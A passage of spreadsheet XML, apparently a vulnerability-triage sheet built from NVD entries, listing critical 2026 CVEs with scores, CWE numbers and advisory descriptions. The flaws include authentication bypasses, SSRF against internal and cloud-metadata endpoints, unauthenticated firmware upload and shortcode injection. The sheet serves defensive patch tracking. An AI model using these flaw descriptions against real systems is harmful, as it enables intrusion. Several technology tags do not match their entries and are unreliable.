the lifetime of the server. TLS clients are not affected.</t>
        </is>
      </c>
      <c r="T40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19445</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74865</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr">
        <is>
          <t>go, rust</t>
        </is>
      </c>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S41" s="5" t="inlineStr">
        <is>
          <t>sogo_yhn configures SOGo with a parameter "SOGoTrustProxyAuthentication=YES". This causes the password to be bypassed during HTTP Basic authentication. An unauthenticated attacker who provides the username of an existing user and any arbitrary password can successfully log in to that user's account.
This issue was fixed in version 5.8.0~ynh9.</t>
        </is>
      </c>
      <c r="T41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74865</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102095</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S42" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Email Protection Gateway before version 9.5.0 is vulnerable to Server-Side Request Forgery. Kiteworks Email Protection Gateway performed server-side fetches of URLs contained in the message content it processed, without adequately restricting the fetch destination. A remote, unauthenticated sender could craft a message that caused the gateway to issue requests to internal services and cloud instance metadata endpoints and return the responses, potentially disclosing sensitive internal data and, depending on the internal service reached, affecting its state.</t>
        </is>
      </c>
      <c r="T42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102095</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102102</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="inlineStr"/>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S43"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an issuer certificate in an inbound message. Depending on the services reachable from the gateway, this could disclose sensitive internal information or disrupt gateway operation.</t>
        </is>
      </c>
      <c r="T43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102102</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102103</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="inlineStr"/>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S44"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 certificate revocation list in an inbound message. Depending on the services reachable from the gateway, this could disclose sensitive internal information or disrupt gateway operation.</t>
        </is>
      </c>
      <c r="T44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102103</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102104</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="inlineStr"/>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S45"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performs an online certificate status check for an inbound message. Depending on the services reachable from the gateway, this could disclose sensitive internal information or disrupt gateway operation.</t>
        </is>
      </c>
      <c r="T45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102104</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102105</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="inlineStr"/>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S46"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renders message content that references external resources. Depending on the services reachable from the gateway, this could disclose sensitive internal information or trigger unintended actions on internal systems.</t>
        </is>
      </c>
      <c r="T46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102105</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102106</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="inlineStr"/>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr"/>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S47" s="5" t="inlineStr">
        <is>
          <t>Improper authentication in a Kiteworks Email Protection Gateway administrative service. An administrative service in Kiteworks Email Protection Gateway did not consistently enforce administrator authentication, so the required password check could be bypassed. An attacker who referenced a valid administrator account could potentially create, modify, or delete internal users and managed domains and change their security-feature configuration without authenticating; deleting a managed domain also removes its user accounts and could lock administrators out of the gateway.</t>
        </is>
      </c>
      <c r="T47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102106</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62308</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr">
        <is>
          <t>docker, requests</t>
        </is>
      </c>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S48" s="5" t="inlineStr">
        <is>
          <t>Tugtainer is a self-hosted app for automating updates of Docker containers. Prior to version 1.30.6, Tugtainer allows an authenticated user to make the backend server send outbound HTTP requests to arbitrary user-supplied URLs through the notification test endpoint. The /settings/test_notification endpoint accepts a urls field and passes it directly to Apprise without restricting protocols, hostnames, localhost addresses, private IP ranges, or cloud metadata addresses. This can be abused as an authenticated blind server-side request forgery (SSRF). This issue has been patched in version 1.30.6.</t>
        </is>
      </c>
      <c r="T48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62308</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75969</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>16cac6a8-cc1e-4741-89aa-6b97e2437706</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="inlineStr"/>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr"/>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S49" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function vulnerability for all PTZOptics cameras and the Firmware Upgrade Tool - Firmware Update modules. A missing authentication vulnerability in the firmware update mechanism of affected PTZOptics cameras allows an unauthenticated user to install modified firmware on the device without administrator credentials.
This vulnerability allows attackers to upload modified firmware to the device without admin credentials. This issue affects:
  *  Move 4K 12X before: 0.0.98
  *  Move 4K 20X before: 0.1.33
  *  Move 4K 30X before: 2.1.17
  *  Link 4K 12X before: 0.0.99
  *  Link 4K 20X before: 0.1.37
  *  Link 4K 30X before: 2.1.18
  *  Move SE 12X before: 9.1.66
  *  Move SE 20X before: 9.1.44
  *  Move SE 30X before: 9.1.46
  *  Studio 4K 12X before: 8.3.32
  *  Studio 4K 20X before: 8.3.32
  *  Studio SE 12X before: 8.3.32
  *  Studio SE 20X before: 8.3.32
  *  All Generation 2 cameras, including: PT12X-SDI-GY-G2, PT12X-SDI-WH-G2, PT12X-NDI-GY-G2, PT12X-NDI-WH-G2; PT12X-USB-GY-G2, PT12X-USB-WH-G2; PT20X-SDI-GY-G2, PT20X-SDI-WH-G2, PT20X-NDI-GY-G2, PT20X-NDI-WH-G2; PT20X-USB-GY-G2, PT20X-USB-WH-G2; PT30X-SDI-GY-G2, PT30X-SDI-WH-G2, PT30X-NDI-GY-G2, PT30X-NDI-WH-G2; PTVL-ZCAM, PTVL-NDI-ZCAM; PTEPTZ-ZCAM-G2, PTEPTZ-NDI-ZCAM-G2; PT12X-ZCAM, PT12X-NDI-ZCAM; PT20X-ZCAM, PT20X-NDI-ZCAM; Studio Pro - All versions
  *  Upgrade Tool - All versions</t>
        </is>
      </c>
      <c r="T49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75969</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77185</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="inlineStr"/>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>CWE-305</t>
        </is>
      </c>
      <c r="S50" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass in sshd-core in Apache MINA SSHD versions 2.0.0 to 2.19.0 and 3.0.0-M1 to 3.0.0-M5 for a certain (presumed rare) way to implement an SSH server.
Apache MINA SSHD is a Java library for client- and server-side SSH. In the server part of the library, a mechanism to perform "asynchronous authentication" exists. A server implemented with Apache MINA SSHD must contain explicit code to make use of this feature. The implementation of this feature was flawed and could potentially lead to skipping checking the signature in public-key or hostbased authentication, or returning a wrong result.
Users are recommended to upgrade to Apache MINA SSHD 2.20.0 or 3.0.0-M6, which fix the logic error and which additionally forbid the use of this "asynchronous authentication" mechanism with the public-key or hostbased authentication schemes: if used, the SSH session will be closed and the server will log an entry indicating that asynchronous authentication may be used only with password or keyboard-interactive authentication.</t>
        </is>
      </c>
      <c r="T50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77185</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87830</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="inlineStr"/>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr">
        <is>
          <t>express</t>
        </is>
      </c>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>CWE-917</t>
        </is>
      </c>
      <c r="S51" s="5" t="inlineStr">
        <is>
          <t>In the StAX streaming WS-SecurityPolicy validator, certain relative or unsupported XPath expressions can be converted into paths that never match the actual XML element path. A remote SOAP peer may therefore send a required element without the expected signature or encryption.
Users are recommended to upgrade to versions 4.0.2 or 3.0.6 or 2.4.4, which fix this issue.</t>
        </is>
      </c>
      <c r="T51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87830</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89238</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="S52" s="5" t="inlineStr">
        <is>
          <t>WSS4J EncryptedHeader child confusion could promote an attacker-controlled plaintext element as the decrypted header, leading to incorrect confidentiality coverage and possible policy bypass.
Users are recommended to upgrade to versions 4.0.2 or 3.0.6 or 2.4.4, which fix this issue.</t>
        </is>
      </c>
      <c r="T52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89238</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92966</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S53" s="5" t="inlineStr">
        <is>
          <t>The The Appointment Booking Plugin – LatePoint | Calendar &amp; Scheduling for WordPress plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5.7.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. The payload is planted during the unauthenticated booking flow and triggered when the Customer Cabinet block rendered by render_customer_dashboard() outputs the stored name into the content stream, where WordPress core's do_shortcode filter at priority 11 re-parses and executes it.</t>
        </is>
      </c>
      <c r="T53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92966</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94052</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="inlineStr"/>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr"/>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr"/>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>CWE-304</t>
        </is>
      </c>
      <c r="S54" s="5" t="inlineStr">
        <is>
          <t>A missing check in LdapPasswordAuthenticator in component sshd-ldap in Apache MINA SSHD versions 1.2.0 to 2.19.0 or 3.0.0-M1 to 3.0.0-M5 bypassed authentication checks.
Apache MINA SSHD is a Java library for client-side and server-side SSH. The optional sshd-ldap component provides support for integrating password and publickey authentication on the server side with an LDAP server.
sshd-ldap is an optional component. SSH servers implemented with Apache MINA SSHD are affected only if they use sshd-ldap and do configure an LdapPasswordAuthenticator to be used for password authentication. Normal password authentication via the built-in mechanisms in sshd-core is _not_ affected by this vulnerability, which concerns only LdapPasswordAuthenticator.
Users are recommended to upgrade affected applications to version 2.20.0 or 3.0.0-M6, which fix this issue.</t>
        </is>
      </c>
      <c r="T54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94052</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94053</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr"/>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr"/>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>CWE-305, CWE-90</t>
        </is>
      </c>
      <c r="S55" s="5" t="inlineStr">
